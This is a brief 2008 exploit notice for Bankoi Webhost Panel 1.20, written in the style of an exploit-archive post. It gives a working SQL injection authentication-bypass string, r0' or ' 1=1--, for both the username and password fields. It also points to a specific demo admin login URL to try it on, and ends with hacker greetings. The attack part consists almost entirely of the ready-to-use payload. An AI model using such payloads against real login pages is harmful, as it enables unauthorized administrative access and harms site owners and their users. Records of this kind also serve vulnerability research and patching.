Bankoi Webhost Panel version 1.20 suffers from a SQL injection vulnerability that allows for authentication bypass.
622c76881814de0635160fde80671cde[~] Bankoi Webhost Panel 1.20 (Auth Bypass)
[~]
[~] ----------------------------------------------------------
[~] author: R3d-D3v!L
[~]
[~] Date: 15.11.2008
[~]
[~] Home: www.ahacker.net
[~]
[~] contact: N/A
[~]
[~] -----------------------------------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~] admin login for demo:
http://demo.webhost-panel.com:8077/login.asp
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]--------------------------------------------------------------------------------
[~] Greetz tO:dolly & maxmos & hesham_hacker & m4n0n & k374 & hi4alex & xp10_hacker
[~]
[~] xp10.biz & ahacker.net
[~]
[~]--------------------------------------------------------------------------------
Comments
No comments yet, be the first!